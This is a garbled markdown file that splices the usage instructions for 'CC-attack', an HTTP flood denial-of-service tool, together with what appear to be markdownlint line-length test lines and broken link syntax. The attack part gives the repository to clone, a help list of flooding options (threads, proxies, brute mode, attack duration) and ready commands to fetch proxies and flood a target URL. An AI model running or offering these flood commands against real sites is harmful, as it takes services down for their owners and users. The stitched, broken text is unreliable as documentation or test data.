**[**<!-- pip3 install requests pysocs -->
]([https://]doc/md041.md
(https://))****

doc/md041.md



git clone
 [def]

```cd CC-attack


python3 cc.py <arguments>

==






=============  CC-attack help list  ===============
   -h/help   | showing this message
   -url      | set target url
   -m/mode   | set program mode
   -data     | set post data path (only works on post mode)
             | (Example: -data data.json)
   -cookies  | set cookies (Example: 'id:xxx;ua:xxx')
   -v        | set proxy type (4/5/http, default:5)
   -t        | set threads number (default:800)
   -f        | set proxies file (default:proxy.txt)
   -b        | enable/disable brute mode
             | Enable=1 Disable=0  (default:0)
   -s        | set attack time(default:60)
   -down     | download proxies
   -check    | check proxies
=====================================================

<git@github.com>:Leeon123/CC-attack.git


[def]: https://github.com/Leeon123/CC-attack.git



{
    "MD013": false
}
python3 cc.py -down -f proxy.txt -v 5




python3 cc.py -url http://target.com -f socks4.txt -v 4 -s 30
-h



IF THIS LINE IS THE MAXIMUM LENGTH
This line is okay because there are-no-spaces-beyond-that-length
This line is a violation because there are spaces beyond that length
This-line-is-okay-because-there-are-no-spaces-anywhere-within



_m